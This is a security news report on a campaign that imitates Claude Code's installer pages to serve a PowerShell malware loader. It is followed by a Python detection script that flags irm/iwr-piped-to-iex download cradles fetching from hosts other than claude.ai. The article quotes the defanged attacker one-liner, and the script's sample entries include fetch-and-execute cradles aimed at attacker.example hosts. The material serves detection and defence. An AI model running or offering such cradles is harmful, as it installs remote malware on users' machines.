“Developers hold the keys to a company’s most sensitive assets – intellectual property, cloud infrastructure, CI/CD pipelines,” said Vineeta Sangaraju, AI Research Engineer at Black Duck. “They also, by necessity, need the freedom to download and install software. That combination makes them a high-value target.”
Ontinue researchers said that everything potentially detectable in the attack chain is wrapped inside the PowerShell loader, which complicates detection. “Two standard API-chain rule sets we evaluated against the binary returned no matches,” they said in a blog post.
The malware has “geographic exclusion” enabled: it checks the host’s Windows region settings against a list of excluded geographies, namely all the CIS member states and Iran, and immediately aborts execution if there is a match.
Campaign replaces Claude Code’s official one-line setup
According to Ontinue, the campaign relies on fake installer pages impersonating Claude Code distribution channels. However, rather than delivering Anthropic’s official one-line install routine, “irm https[:]//claude[.]ai/install.ps1 | iex,” the pages serve attacker-controlled PowerShell commands (“irm occasions[.]msft23[.]com | iex”) that initiate a staged payload chain.
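The substitution described above is a download cradle (a web fetch piped into `iex`) whose only distinguishing feature is the host it fetches from. The detection logic below is an added example, not code from Ontinue or the article: it extracts the fetched host from PowerShell script-block text and flags any cradle that does not point at claude.ai. The sample script-block entries and the `attacker.example` hosts are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Hosts from which the genuine Claude Code one-liner is fetched (claude.ai is from the
# article); any other host reached through a cradle is treated as suspect.
TRUSTED_HOSTS = {"claude.ai"}

# A download cradle: irm/iwr (or their long names) with a URL, piped into iex/Invoke-Expression.
CRADLE_RE = re.compile(
    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\s+(?P<url>\S+)"
    r"[^|]*\|\s*(?:iex|invoke-expression)\b",
    re.IGNORECASE,
)


def cradle_host(script_text: str):
    """Return the host fetched by an irm/iwr | iex cradle in script_text, or None if there is none."""
    m = CRADLE_RE.search(script_text)
    if not m:
        return None
    url = m.group("url").strip("'\"")
    if "://" not in url:
        # irm accepts a bare host (as in the attacker's one-liner); normalize so urlparse sees a host
        url = "http://" + url
    host = urlparse(url).hostname
    return host.lower() if host else None


def classify(script_text: str) -> str:
    """Label one script block: no-cradle, trusted-cradle, or suspicious-cradle."""
    host = cradle_host(script_text)
    if host is None:
        return "no-cradle"
    return "trusted-cradle" if host in TRUSTED_HOSTS else "suspicious-cradle"


# Constructed sample script-block entries (e.g. from PowerShell script block logging), not real logs.
SAMPLE_SCRIPT_BLOCKS = [
    "irm https://claude.ai/install.ps1 | iex",
    "irm attacker.example | iex",
    "Invoke-WebRequest 'https://cdn.attacker.example/a.ps1' -UseBasicParsing | Invoke-Expression",
    "Get-ChildItem C:\\Users",
]


def scan(blocks):
    """Return (script_text, verdict) pairs for a list of script blocks."""
    return [(b, classify(b)) for b in blocks]


if __name__ == "__main__":
    for text, verdict in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"{verdict:<18} {text}")
```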